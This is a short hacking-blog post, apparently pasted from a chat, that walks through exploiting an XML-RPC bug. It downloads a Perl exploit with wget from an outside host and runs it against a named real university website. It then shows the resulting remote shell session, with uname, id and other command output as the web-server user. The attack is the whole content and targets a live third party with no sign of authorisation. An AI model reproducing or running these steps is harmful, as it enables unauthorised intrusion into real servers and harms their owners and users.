Wednesday, 12 December 2012

Posted by INDIAN ETHICAL HACKING On 09:33
How to exploit a site with XML bug? <&sql> First of all you need to have installed perl on ur OS, if you don't have use activeperl for windows, if u re using linux it's a better thing <&sql> after it <&sql> download this source code to ur pc <&sql> wget http://theinvite.info/stuff/sqlxml.txt <&sql> if u re using linux then use wget :) <&sql> on win do it manually copy/paste to sqlxml.txt <&sql> now lets go on <&sql> to the funniest thing <&sql> search ur sqlml.txt throught ur activeperl promt <&sql> or linux console <&sql> cd whatever <&sql> now <&sql> put this command when you have found it <&sql> perl sqlxml.txt http://www.luiss.it/siti//nucleus/xmlrpc/server.php <&sql> after that, try this command <&sql> uname -a; id <&sql> sql-shell@#uname -a;id <&sql> SunOS marte 5.10 Generic_138888-08 sun4u sparc SUNW,Sun-Fire-V245 <&sql> uid=80(webservd) gid=80(webservd) <&sql> sql-shell@#who -r <&sql> . run-level 3 set 13 08:20 3 0 S <&sql> sql-shell@#date; logname <&sql> martedì 5 luglio 2011 13:53:33 CEST <&sql> welcome u re in luiss.it <&sql> that re the basic things how to get into hosts which have a vun. bug in xml. <&sql> :)

0 comments:

Post a Comment